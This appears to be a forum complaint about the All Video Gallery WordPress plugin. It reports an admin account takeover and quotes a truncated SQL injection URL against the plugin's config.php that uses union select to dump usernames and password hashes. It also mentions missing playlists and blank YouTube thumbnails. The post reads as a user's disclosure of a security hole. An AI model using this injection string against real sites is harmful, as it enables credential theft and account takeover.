This plugin has a vulnerability. Someone was able to access my admin account and change the password using the following which goes on much longer than shown with a whole bunch of numbers at the end.
wp-content/plugins/all-video-gallery/config.php?vid=7&pid=1 union select 1,2,3,4,group_concat(user_login,0x3a,user_pass),
It is also lacking in a basic function to create playlists from the videos.
There is also an error creating the Youtube thumbnail so the thumbnail is blank
- The topic ‘Vulnerable and lacking’ is closed to new replies.